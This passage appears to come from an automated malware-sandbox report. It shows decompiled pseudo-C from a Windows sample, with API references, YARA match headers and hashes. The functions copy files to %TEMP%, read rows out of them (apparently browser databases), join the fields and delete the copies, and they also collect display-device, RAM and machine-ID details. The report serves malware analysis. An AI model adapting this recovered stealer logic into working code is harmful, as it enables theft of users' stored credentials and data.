                            				 *_t66 =  *_t66 + _t66;
                            				_v117 = _v117 + __edx;
                            				_t219 = _t220;
                            				_t181 = 0xa;
                            				do {
                            					_push(0);
                            					_push(0);
                            					_t181 = _t181 - 1;
                            					_t228 = _t181;
                            				} while (_t181 != 0);
                            				_push(_t181);
                            				_push(__ebx);
                            				_push(__esi);
                            				_push(__edi);
                            				_v12 = __edx;
                            				_v8 = _t66;
                            				E00404150( &_v8);
                            				_push(_t219);
                            				_push(0x4115ab);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t220;
                            				E00403BDC( &_v28);
                            				_push(_t219);
                            				_push(0x411526);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t220;
                            				E0040709C(GetTickCount(), __ebx,  &_v52, __esi, _t228);
                            				_push(_v52);
                            				E00406FDC( &_v56, __ebx, __edi, __esi, _t228);
                            				_push(_v56);
                            				_push(L".tmp");
                            				E00403E78();
                            				E004078D8(_v8, _t180,  &_v40, _t228);
                            				E004062FC(L"%TEMP%",  &_v64, _t228);
                            				_push(_v64);
                            				_push(0x4115e4);
                            				_push(_v32);
                            				E00403E78();
                            				E004078D8(_v60, _t180,  &_v44, _t228);
                            				_t86 = E00403D98(_v44);
                            				CopyFileW(E00403D98(_v40), _t86, 0xffffffff);
                            				E0040377C( &_v68, _v44);
                            				E00404B58(_v68, _t180, _t181,  &_v36, _t217, _t228);
                            				E00403D88( &_v72, _v36);
                            				if(E0040776C(_v72, _t180, _t181) != 0) {
                            					_t101 =  *0x41b140; // 0x41ca20
                            					_t103 =  *((intOrPtr*)( *_t101))(E00403990(_v36),  &_v16);
                            					_t221 = _t220 + 8;
                            					__eflags = _t103;
                            					if(_t103 == 0) {
                            						_t137 =  *0x41b390; // 0x41c934
                            						_t141 =  *0x41b2d4; // 0x41ca28
                            						_t143 =  *((intOrPtr*)( *_t141))(_v16, E00403990( *_t137), 0xffffffff,  &_v20,  &_v24);
                            						_t222 = _t221 + 0x14;
                            						__eflags = _t143;
                            						if(_t143 == 0) {
                            							while(1) {
                            								_t145 =  *0x41b384; // 0x41ca2c
                            								_t147 =  *((intOrPtr*)( *_t145))(_v20);
                            								__eflags = _t147 - 0x64;
                            								if(_t147 != 0x64) {
                            									goto L10;
                            								}
                            								_t149 =  *0x41b414; // 0x41ca34
                            								_t153 =  *0x41b1dc; // 0x41ca30
                            								_t155 =  *((intOrPtr*)( *_t153))(_v20, 3,  *((intOrPtr*)( *_t149))(_v20, 3));
                            								_pop(_t209);
                            								E0040A610(_t155,  &_v48, _t209);
                            								E00403D88( &_v76, _v48);
                            								_t160 =  *0x41b1dc; // 0x41ca30
                            								E00403CF4( &_v80,  *((intOrPtr*)( *_t160))(_v20, 0, 0x4115ec, _v76, _v28));
                            								_t166 =  *0x41b1dc; // 0x41ca30
                            								E00403CF4( &_v84,  *((intOrPtr*)( *_t166))(_v20, 1, 0x4115ec, _v80));
                            								_t172 =  *0x41b1dc; // 0x41ca30
                            								_t174 =  *((intOrPtr*)( *_t172))(_v20, 2, 0x4115f8, _v84);
                            								_t222 = _t222 + 0x28;
                            								E00403CF4( &_v88, _t174);
                            								_push(_v88);
                            								_push(L"\r\n\r\n");
                            								E00403E78();
                            								_t178 =  *0x41b1cc; // 0x41b0b4
                            								 *_t178 =  *_t178 + 1;
                            								__eflags =  *_t178;
                            							}
                            						}
                            					}
                            					L10:
                            					_t105 =  *0x41b46c; // 0x41ca38
                            					 *((intOrPtr*)( *_t105))(_v20);
                            					_t109 =  *0x41b20c; // 0x41ca24
                            					 *((intOrPtr*)( *_t109))(_v16);
                            					_pop(_t202);
                            					 *[fs:eax] = _t202;
                            					E00403C18(_v12, _v28);
                            					DeleteFileW(E00403D98(_v44));
                            				} else {
                            					_pop(_t215);
                            					 *[fs:eax] = _t215;
                            				}
                            				_pop(_t204);
                            				 *[fs:eax] = _t204;
                            				_push(E004115B2);
                            				E00403BF4( &_v88, 5);
                            				E004034E4( &_v68);
                            				E00403BF4( &_v64, 4);
                            				E004034E4( &_v48);
                            				E00403BF4( &_v44, 2);
                            				E004034E4( &_v36);
                            				E00403BF4( &_v32, 2);
                            				return E00403BDC( &_v8);
                            			}

                            APIs
                            • GetTickCount.KERNEL32 ref: 00411315
                            • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004115E4,?,.tmp,?,?,00000000,00411526,?,00000000,004115AB,?,00000000), ref: 00411391
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: CopyCountFileTick
                            • String ID: %TEMP%$.tmp
                            • API String ID: 3448371392-3650661790
                            • Opcode ID: bd55e28a2ebad2aea21c6941145fc2ef948e992f272b45b9c354dd56caf94c7c
                            • Instruction ID: 8afa6536208aa5b6f57682845dada9e2518f3e9b5e83f9eef4c4991f65faefc0
                            • Opcode Fuzzy Hash: bd55e28a2ebad2aea21c6941145fc2ef948e992f272b45b9c354dd56caf94c7c
                            • Instruction Fuzzy Hash: 7F414631900108AFDB01FF92D842ACDFBB9EF44309F50447BF504B36A2D63CAE058A14
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 45%
                            			E0041102C(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                            				signed int _v8;
                            				intOrPtr _v12;
                            				char _v16;
                            				char _v20;
                            				char _v24;
                            				char _v28;
                            				char _v32;
                            				char _v36;
                            				char _v40;
                            				char _v44;
                            				char _v48;
                            				char _v52;
                            				intOrPtr _v56;
                            				char _v60;
                            				char _v64;
                            				char _v68;
                            				char _v72;
                            				char _v76;
                            				signed int _t53;
                            				signed int _t54;
                            				WCHAR* _t74;
                            				intOrPtr* _t89;
                            				void* _t91;
                            				intOrPtr* _t93;
                            				intOrPtr* _t97;
                            				intOrPtr* _t121;
                            				intOrPtr* _t125;
                            				void* _t127;
                            				intOrPtr* _t129;
                            				void* _t131;
                            				intOrPtr* _t133;
                            				intOrPtr* _t139;
                            				void* _t141;
                            				void* _t147;
                            				intOrPtr _t167;
                            				intOrPtr _t169;
                            				intOrPtr _t176;
                            				intOrPtr _t180;
                            				intOrPtr _t181;
                            				void* _t182;
                            				void* _t183;
                            
                            				_t178 = __esi;
                            				_t146 = __ebx;
                            				_t53 = __eax +  *__eax;
                            				 *_t53 =  *_t53 + _t53;
                            				_t54 = _t53 | 0x5500000a;
                            				_t180 = _t181;
                            				_t147 = 9;
                            				do {
                            					_push(0);
                            					_push(0);
                            					_t147 = _t147 - 1;
                            					_t187 = _t147;
                            				} while (_t147 != 0);
                            				_push(__ebx);
                            				_push(__esi);
                            				_push(__edi);
                            				_v12 = __edx;
                            				_v8 = _t54;
                            				E00404150( &_v8);
                            				_push(_t180);
                            				_push(0x411282);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t181;
                            				E00403BDC( &_v28);
                            				_push(_t180);
                            				_push(0x411212);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t181;
                            				E0040709C(GetTickCount(), __ebx,  &_v48, __esi, _t187);
                            				_push(_v48);
                            				E00406FDC( &_v52, __ebx, __edi, __esi, _t187);
                            				_push(_v52);
                            				_push(L".tmp");
                            				E00403E78();
                            				E004078D8(_v8, _t146,  &_v40, _t187);
                            				E004062FC(L"%TEMP%",  &_v60, _t187);
                            				_push(_v60);
                            				_push(E004112B8);
                            				_push(_v32);
                            				E00403E78();
                            				E004078D8(_v56, _t146,  &_v44, _t187);
                            				_t74 = E00403D98(_v44);
                            				CopyFileW(E00403D98(_v40), _t74, 0xffffffff);
                            				E0040377C( &_v64, _v44);
                            				E00404B58(_v64, _t146, _t147,  &_v36, _t178, _t187);
                            				E00403D88( &_v68, _v36);
                            				if(E0040776C(_v68, _t146, _t147) != 0) {
                            					_t89 =  *0x41b140; // 0x41ca20
                            					_t91 =  *((intOrPtr*)( *_t89))(E00403990(_v36),  &_v16);
                            					_t182 = _t181 + 8;
                            					__eflags = _t91;
                            					if(_t91 == 0) {
                            						_t121 =  *0x41b330; // 0x41c930
                            						_t125 =  *0x41b2d4; // 0x41ca28
                            						_t127 =  *((intOrPtr*)( *_t125))(_v16, E00403990( *_t121), 0xffffffff,  &_v20,  &_v24);
                            						_t183 = _t182 + 0x14;
                            						__eflags = _t127;
                            						if(_t127 == 0) {
                            							while(1) {
                            								_t129 =  *0x41b384; // 0x41ca2c
                            								_t131 =  *((intOrPtr*)( *_t129))(_v20);
                            								__eflags = _t131 - 0x64;
                            								if(_t131 != 0x64) {
                            									goto L11;
                            								}
                            								_t133 =  *0x41b1dc; // 0x41ca30
                            								E00403CF4( &_v72,  *((intOrPtr*)( *_t133))(_v20, 0, _v28));
                            								_t139 =  *0x41b1dc; // 0x41ca30
                            								_t141 =  *((intOrPtr*)( *_t139))(_v20, 1, E004112C0, _v72);
                            								_t183 = _t183 + 0x10;
                            								E00403CF4( &_v76, _t141);
                            								_push(_v76);
                            								_push(E004112C8);
                            								E00403E78();
                            							}
                            						}
                            					}
                            					L11:
                            					_t93 =  *0x41b46c; // 0x41ca38
                            					 *((intOrPtr*)( *_t93))(_v20);
                            					_t97 =  *0x41b20c; // 0x41ca24
                            					 *((intOrPtr*)( *_t97))(_v16);
                            					_pop(_t167);
                            					 *[fs:eax] = _t167;
                            					E00403C18(_v12, _v28);
                            					DeleteFileW(E00403D98(_v44));
                            				} else {
                            					_pop(_t176);
                            					 *[fs:eax] = _t176;
                            				}
                            				_pop(_t169);
                            				 *[fs:eax] = _t169;
                            				_push(E00411289);
                            				E00403BF4( &_v76, 3);
                            				E004034E4( &_v64);
                            				E00403BF4( &_v60, 6);
                            				E004034E4( &_v36);
                            				E00403BF4( &_v32, 2);
                            				return E00403BDC( &_v8);
                            			}

                            0x0041102c
                            0x0041102c
                            0x0041102c
                            0x0041102e
                            0x00411030
                            0x00411035
                            0x00411037
                            0x0041103c
                            0x0041103c
                            0x0041103e
                            0x00411040
                            0x00411040
                            0x00411040
                            0x00411043
                            0x00411044
                            0x00411045
                            0x00411046
                            0x00411049
                            0x0041104f
                            0x00411056
                            0x00411057
                            0x0041105c
                            0x0041105f
                            0x00411065
                            0x0041106c
                            0x0041106d
                            0x00411072
                            0x00411075
                            0x00411080
                            0x00411085
                            0x0041108b
                            0x00411090
                            0x00411093
                            0x004110a0
                            0x004110ab
                            0x004110b8
                            0x004110bd
                            0x004110c0
                            0x004110c5
                            0x004110d0
                            0x004110db
                            0x004110e5
                            0x004110f4
                            0x004110ff
                            0x0041110a
                            0x00411115
                            0x00411124
                            0x00411140
                            0x00411147
                            0x00411149
                            0x0041114c
                            0x0041114e
                            0x0041115e
                            0x0041116f
                            0x00411176
                            0x00411178
                            0x0041117b
                            0x0041117d
                            0x004111d9
                            0x004111dd
                            0x004111e4
                            0x004111e7
                            0x004111ea
                            0x00000000
                            0x00000000
                            0x0041118a
                            0x0041119b
                            0x004111ae
                            0x004111b5
                            0x004111b7
                            0x004111bf
                            0x004111c4
                            0x004111c7
                            0x004111d4
                            0x004111d4
                            0x004111d9
                            0x0041117d
                            0x004111ec
                            0x004111f0
                            0x004111f7
                            0x004111fe
                            0x00411205
                            0x0041120a
                            0x0041120d
                            0x00411222
                            0x00411230
                            0x00411126
                            0x00411128
                            0x0041112b
                            0x0041112b
                            0x00411237
                            0x0041123a
                            0x0041123d
                            0x0041124a
                            0x00411252
                            0x0041125f
                            0x00411267
                            0x00411274
                            0x00411281

                            APIs
                            • GetTickCount.KERNEL32 ref: 00411078
                            • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004112B8,?,.tmp,?,?,00000000,00411212,?,00000000,00411282,?,00000000), ref: 004110F4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: CopyCountFileTick
                            • String ID: %TEMP%$.tmp
                            • API String ID: 3448371392-3650661790
                            • Opcode ID: 7311b6e77228ae1af996723f05f2f720d011b8d184081227477208721a99883f
                            • Instruction ID: 086439bef84ae03ebcf91c6f71c22103effc3d3d1ef1d95b9ffc13b6feb758dd
                            • Opcode Fuzzy Hash: 7311b6e77228ae1af996723f05f2f720d011b8d184081227477208721a99883f
                            • Instruction Fuzzy Hash: 53315531904108AFDB01FFA1D942ADDBBB9EF49304F50447BF504B36A2D738AE069A58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 45%
                            			E00411030(signed int __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                            				signed int _v8;
                            				intOrPtr _v12;
                            				char _v16;
                            				char _v20;
                            				char _v24;
                            				char _v28;
                            				char _v32;
                            				char _v36;
                            				char _v40;
                            				char _v44;
                            				char _v48;
                            				char _v52;
                            				intOrPtr _v56;
                            				char _v60;
                            				char _v64;
                            				char _v68;
                            				char _v72;
                            				char _v76;
                            				signed int _t53;
                            				WCHAR* _t73;
                            				intOrPtr* _t88;
                            				void* _t90;
                            				intOrPtr* _t92;
                            				intOrPtr* _t96;
                            				intOrPtr* _t120;
                            				intOrPtr* _t124;
                            				void* _t126;
                            				intOrPtr* _t128;
                            				void* _t130;
                            				intOrPtr* _t132;
                            				intOrPtr* _t138;
                            				void* _t140;
                            				void* _t146;
                            				intOrPtr _t166;
                            				intOrPtr _t168;
                            				intOrPtr _t175;
                            				intOrPtr _t179;
                            				intOrPtr _t180;
                            				void* _t181;
                            				void* _t182;
                            
                            				_t177 = __esi;
                            				_t145 = __ebx;
                            				_t53 = __eax | 0x5500000a;
                            				_t179 = _t180;
                            				_t146 = 9;
                            				do {
                            					_push(0);
                            					_push(0);
                            					_t146 = _t146 - 1;
                            					_t185 = _t146;
                            				} while (_t146 != 0);
                            				_push(__ebx);
                            				_push(__esi);
                            				_push(__edi);
                            				_v12 = __edx;
                            				_v8 = _t53;
                            				E00404150( &_v8);
                            				_push(_t179);
                            				_push(0x411282);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t180;
                            				E00403BDC( &_v28);
                            				_push(_t179);
                            				_push(0x411212);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t180;
                            				E0040709C(GetTickCount(), __ebx,  &_v48, __esi, _t185);
                            				_push(_v48);
                            				E00406FDC( &_v52, __ebx, __edi, __esi, _t185);
                            				_push(_v52);
                            				_push(L".tmp");
                            				E00403E78();
                            				E004078D8(_v8, _t145,  &_v40, _t185);
                            				E004062FC(L"%TEMP%",  &_v60, _t185);
                            				_push(_v60);
                            				_push(E004112B8);
                            				_push(_v32);
                            				E00403E78();
                            				E004078D8(_v56, _t145,  &_v44, _t185);
                            				_t73 = E00403D98(_v44);
                            				CopyFileW(E00403D98(_v40), _t73, 0xffffffff);
                            				E0040377C( &_v64, _v44);
                            				E00404B58(_v64, _t145, _t146,  &_v36, _t177, _t185);
                            				E00403D88( &_v68, _v36);
                            				if(E0040776C(_v68, _t145, _t146) != 0) {
                            					_t88 =  *0x41b140; // 0x41ca20
                            					_t90 =  *((intOrPtr*)( *_t88))(E00403990(_v36),  &_v16);
                            					_t181 = _t180 + 8;
                            					__eflags = _t90;
                            					if(_t90 == 0) {
                            						_t120 =  *0x41b330; // 0x41c930
                            						_t124 =  *0x41b2d4; // 0x41ca28
                            						_t126 =  *((intOrPtr*)( *_t124))(_v16, E00403990( *_t120), 0xffffffff,  &_v20,  &_v24);
                            						_t182 = _t181 + 0x14;
                            						__eflags = _t126;
                            						if(_t126 == 0) {
                            							while(1) {
                            								_t128 =  *0x41b384; // 0x41ca2c
                            								_t130 =  *((intOrPtr*)( *_t128))(_v20);
                            								__eflags = _t130 - 0x64;
                            								if(_t130 != 0x64) {
                            									goto L10;
                            								}
                            								_t132 =  *0x41b1dc; // 0x41ca30
                            								E00403CF4( &_v72,  *((intOrPtr*)( *_t132))(_v20, 0, _v28));
                            								_t138 =  *0x41b1dc; // 0x41ca30
                            								_t140 =  *((intOrPtr*)( *_t138))(_v20, 1, E004112C0, _v72);
                            								_t182 = _t182 + 0x10;
                            								E00403CF4( &_v76, _t140);
                            								_push(_v76);
                            								_push(E004112C8);
                            								E00403E78();
                            							}
                            						}
                            					}
                            					L10:
                            					_t92 =  *0x41b46c; // 0x41ca38
                            					 *((intOrPtr*)( *_t92))(_v20);
                            					_t96 =  *0x41b20c; // 0x41ca24
                            					 *((intOrPtr*)( *_t96))(_v16);
                            					_pop(_t166);
                            					 *[fs:eax] = _t166;
                            					E00403C18(_v12, _v28);
                            					DeleteFileW(E00403D98(_v44));
                            				} else {
                            					_pop(_t175);
                            					 *[fs:eax] = _t175;
                            				}
                            				_pop(_t168);
                            				 *[fs:eax] = _t168;
                            				_push(E00411289);
                            				E00403BF4( &_v76, 3);
                            				E004034E4( &_v64);
                            				E00403BF4( &_v60, 6);
                            				E004034E4( &_v36);
                            				E00403BF4( &_v32, 2);
                            				return E00403BDC( &_v8);
                            			}

                            0x00411030
                            0x00411030
                            0x00411030
                            0x00411035
                            0x00411037
                            0x0041103c
                            0x0041103c
                            0x0041103e
                            0x00411040
                            0x00411040
                            0x00411040
                            0x00411043
                            0x00411044
                            0x00411045
                            0x00411046
                            0x00411049
                            0x0041104f
                            0x00411056
                            0x00411057
                            0x0041105c
                            0x0041105f
                            0x00411065
                            0x0041106c
                            0x0041106d
                            0x00411072
                            0x00411075
                            0x00411080
                            0x00411085
                            0x0041108b
                            0x00411090
                            0x00411093
                            0x004110a0
                            0x004110ab
                            0x004110b8
                            0x004110bd
                            0x004110c0
                            0x004110c5
                            0x004110d0
                            0x004110db
                            0x004110e5
                            0x004110f4
                            0x004110ff
                            0x0041110a
                            0x00411115
                            0x00411124
                            0x00411140
                            0x00411147
                            0x00411149
                            0x0041114c
                            0x0041114e
                            0x0041115e
                            0x0041116f
                            0x00411176
                            0x00411178
                            0x0041117b
                            0x0041117d
                            0x004111d9
                            0x004111dd
                            0x004111e4
                            0x004111e7
                            0x004111ea
                            0x00000000
                            0x00000000
                            0x0041118a
                            0x0041119b
                            0x004111ae
                            0x004111b5
                            0x004111b7
                            0x004111bf
                            0x004111c4
                            0x004111c7
                            0x004111d4
                            0x004111d4
                            0x004111d9
                            0x0041117d
                            0x004111ec
                            0x004111f0
                            0x004111f7
                            0x004111fe
                            0x00411205
                            0x0041120a
                            0x0041120d
                            0x00411222
                            0x00411230
                            0x00411126
                            0x00411128
                            0x0041112b
                            0x0041112b
                            0x00411237
                            0x0041123a
                            0x0041123d
                            0x0041124a
                            0x00411252
                            0x0041125f
                            0x00411267
                            0x00411274
                            0x00411281

                            APIs
                            • GetTickCount.KERNEL32 ref: 00411078
                            • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004112B8,?,.tmp,?,?,00000000,00411212,?,00000000,00411282,?,00000000), ref: 004110F4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: CopyCountFileTick
                            • String ID: %TEMP%$.tmp
                            • API String ID: 3448371392-3650661790
                            • Opcode ID: 5fd39944ce94f9eb84f2dee8ddcbd91ace201591751bedb5e53dfda76a551d43
                            • Instruction ID: c9e68ca033382928e780bbb2ca05a045859d404701f4d2a11d4424a3b4ff7e89
                            • Opcode Fuzzy Hash: 5fd39944ce94f9eb84f2dee8ddcbd91ace201591751bedb5e53dfda76a551d43
                            • Instruction Fuzzy Hash: FA313531900109AEDB01FF91D942ADDBBB9EF48305F50457BF504B26A2D738AE059A58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 21%
                            			E00415D60(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                            				_Unknown_base(*)()* _v8;
                            				char _v140;
                            				char _v176;
                            				char _v180;
                            				void* _t23;
                            				intOrPtr _t30;
                            				intOrPtr* _t34;
                            				void* _t37;
                            
                            				_v180 = 0;
                            				_t34 = __eax;
                            				_push(_t37);
                            				_push(0x415e07);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t37 + 0xffffff50;
                            				_v8 = GetProcAddress(LoadLibraryA("user32.dll"), "EnumDisplayDevicesA");
                            				_v176 = 0xa8;
                            				_t23 = 0;
                            				while(1) {
                            					_push(0);
                            					_push( &_v176);
                            					_push(_t23);
                            					_push(0);
                            					if(_v8() == 0) {
                            						break;
                            					}
                            					_t23 = _t23 + 1;
                            					_push( *_t34);
                            					E00403748( &_v180, 0x80,  &_v140);
                            					_push(_v180);
                            					_push(E00415E40);
                            					E00403850();
                            				}
                            				_pop(_t30);
                            				 *[fs:eax] = _t30;
                            				_push(E00415E0E);
                            				return E004034E4( &_v180);
                            			}

                            0x00415d6e
                            0x00415d74
                            0x00415d78
                            0x00415d79
                            0x00415d7e
                            0x00415d81
                            0x00415d99
                            0x00415d9c
                            0x00415da8
                            0x00415ddc
                            0x00415ddc
                            0x00415de3
                            0x00415de4
                            0x00415de5
                            0x00415dec
                            0x00000000
                            0x00000000
                            0x00415dac
                            0x00415dad
                            0x00415dc0
                            0x00415dc5
                            0x00415dcb
                            0x00415dd7
                            0x00415dd7
                            0x00415df0
                            0x00415df3
                            0x00415df6
                            0x00415e06

                            APIs
                            • LoadLibraryA.KERNEL32(user32.dll,EnumDisplayDevicesA,00000000,00415E07,?,-00000001,?,?,?,00415F5F,Video Info,?,004160A8,?,GetRAM: ,?), ref: 00415D8E
                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00415D94
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: EnumDisplayDevicesA$user32.dll
                            • API String ID: 2574300362-2278183399
                            • Opcode ID: 580ff82134670aa987a5e473902bab3f0dff3117063d3f862a1f5ecf126ff010
                            • Instruction ID: 9dd9bdf3a8bde6cf78cd03fc344b6578603246f1cfb7de35a5983435c2d557c6
                            • Opcode Fuzzy Hash: 580ff82134670aa987a5e473902bab3f0dff3117063d3f862a1f5ecf126ff010
                            • Instruction Fuzzy Hash: 3901A571A00708AEE7209F62CC41BDB77ADEBC5714F5180BAF508E2180DA785F408A69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 68%
                            			E0040E79C(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                            				char _v8;
                            				intOrPtr _v12;
                            				char _v16;
                            				char _v20;
                            				char _v24;
                            				char _v28;
                            				void* _t29;
                            				void* _t40;
                            				WCHAR* _t51;
                            				int _t54;
                            				void* _t59;
                            				intOrPtr _t63;
                            				intOrPtr _t64;
                            				void* _t73;
                            				void* _t74;
                            				intOrPtr _t77;
                            				void* _t78;
                            				void* _t79;
                            
                            				_t74 = __esi;
                            				_t73 = __edi;
                            				_t63 = __edx;
                            				_t59 = __ebx;
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_v12 = __edx;
                            				_v8 = __eax;
                            				E00404150( &_v8);
                            				E00403980(_v12);
                            				_push(_t77);
                            				_push(0x40e89b);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t77;
                            				_t29 = E00403790(_v16);
                            				asm("cdq");
                            				_t78 = _t63 -  *0x41cac8; // 0x0
                            				if(_t78 != 0) {
                            					if(__eflags < 0) {
                            						goto L4;
                            					}
                            				} else {
                            					_t79 = _t29 -  *0x41cac4; // 0x0
                            					if(_t79 < 0) {
                            						L4:
                            						E00407228(_v8, _t59,  &_v16);
                            						_t40 = E00403790(_v16);
                            						_t80 = _t40;
                            						if(_t40 == 0) {
                            							E004062FC(L"%TEMP%\\curbuf.dat",  &_v20, _t80);
                            							_t51 = E00403D98(_v20);
                            							_t54 = CopyFileW(E00403D98(_v8), _t51, 0);
                            							_t81 = _t54;
                            							if(_t54 != 0) {
                            								E004062FC(L"%TEMP%\\curbuf.dat",  &_v24, _t81);
                            								E00407228(_v24, _t59,  &_v16);
                            							}
                            						}
                            						E0040E6D4(_v16, _t59, _v12, _t73, _t74);
                            						E004062FC(L"%TEMP%\\curbuf.dat",  &_v28, _t81);
                            						DeleteFileW(E00403D98(_v28));
                            					}
                            				}
                            				_pop(_t64);
                            				 *[fs:eax] = _t64;
                            				_push(E0040E8A2);
                            				E00403BF4( &_v28, 3);
                            				E00403508( &_v16, 2);
                            				return E00403BDC( &_v8);
                            			}

                            0x0040e79c
                            0x0040e79c
                            0x0040e79c
                            0x0040e79c
                            0x0040e7a1
                            0x0040e7a2
                            0x0040e7a3
                            0x0040e7a4
                            0x0040e7a5
                            0x0040e7a6
                            0x0040e7a7
                            0x0040e7aa
                            0x0040e7b0
                            0x0040e7b8
                            0x0040e7bf
                            0x0040e7c0
                            0x0040e7c5
                            0x0040e7c8
                            0x0040e7ce
                            0x0040e7d3
                            0x0040e7d4
                            0x0040e7da
                            0x0040e7ea
                            0x00000000
                            0x00000000
                            0x0040e7dc
                            0x0040e7dc
                            0x0040e7e2
                            0x0040e7ec
                            0x0040e7f2
                            0x0040e7fa
                            0x0040e7ff
                            0x0040e801
                            0x0040e80d
                            0x0040e815
                            0x0040e824
                            0x0040e829
                            0x0040e82b
                            0x0040e835
                            0x0040e840
                            0x0040e840
                            0x0040e82b
                            0x0040e84b
                            0x0040e858
                            0x0040e866
                            0x0040e866
                            0x0040e7e2
                            0x0040e86d
                            0x0040e870
                            0x0040e873
                            0x0040e880
                            0x0040e88d
                            0x0040e89a

                            APIs
                              • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                            • CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,0040E89B,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00414448,00000001,0041479C), ref: 0040E824
                            • DeleteFileW.KERNEL32(00000000,00000000,0040E89B,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00414448,00000001,0041479C,00000001,?), ref: 0040E866
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: File$AllocCopyDeleteString
                            • String ID: %TEMP%\curbuf.dat
                            • API String ID: 5292005-3767633259
                            • Opcode ID: 7511669ce6d750ab19369d8c7794633a3e14d78113dbd2a921600efbbbf438c6
                            • Instruction ID: 82a9ed53c2a697d02335697899508965461685f21aee0589c72fe3466f83eb79
                            • Opcode Fuzzy Hash: 7511669ce6d750ab19369d8c7794633a3e14d78113dbd2a921600efbbbf438c6
                            • Instruction Fuzzy Hash: 4D211271A00209EBDB00FBA6D94299EB7B8EF44309F50897BF400B32D1D738AE11965D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 71%
                            			E0040246C(intOrPtr __eax, void* __edx) {
                            				intOrPtr _v8;
                            				void* __ecx;
                            				void* __ebp;
                            				intOrPtr _t25;
                            				intOrPtr _t36;
                            				intOrPtr _t39;
                            				void* _t42;
                            				intOrPtr _t45;
                            				intOrPtr _t47;
                            
                            				_t45 = _t47;
                            				_t42 = __edx;
                            				_t25 = __eax;
                            				if( *0x41c5ac != 0 || E00401870() != 0) {
                            					_push(_t45);
                            					_push("�^");
                            					_push( *[fs:edx]);
                            					 *[fs:edx] = _t47;
                            					if( *0x41c035 != 0) {
                            						_push(0x41c5b4);
                            						L004011CC();
                            					}
                            					if(E00402290(_t25, _t42) == 0) {
                            						_t39 = E00401F5C(_t42);
                            						_t15 = ( *(_t25 - 4) & 0x7ffffffc) - 4;
                            						if(_t42 < ( *(_t25 - 4) & 0x7ffffffc) - 4) {
                            							_t15 = _t42;
                            						}
                            						if(_t39 != 0) {
                            							E00402628(_t25, _t15, _t39);
                            							E004020EC(_t25);
                            						}
                            						_v8 = _t39;
                            					} else {
                            						_v8 = _t25;
                            					}
                            					_pop(_t36);
                            					 *[fs:eax] = _t36;
                            					_push(E00402524);
                            					if( *0x41c035 != 0) {
                            						_push(0x41c5b4);
                            						L004011D4();
                            						return 0;
                            					}
                            					return 0;
                            				} else {
                            					_v8 = 0;
                            					return _v8;
                            				}
                            			}


                            APIs
                            • RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,^), ref: 004024AF
                            • RtlLeaveCriticalSection.KERNEL32(0041C5B4,00402524), ref: 00402517
                              • Part of subcall function 00401870: RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
                              • Part of subcall function 00401870: RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
                              • Part of subcall function 00401870: LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
                              • Part of subcall function 00401870: RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                            • String ID: ^
                            • API String ID: 2227675388-551292248
                            • Opcode ID: eac761777844288f10562a69e6fe07890201df0bfc717e3aee39787a8c1195b3
                            • Instruction ID: 4ed45a5183fb1a6edd108f9af425bfacc088641811e0c18f6da98f6ec62fa594
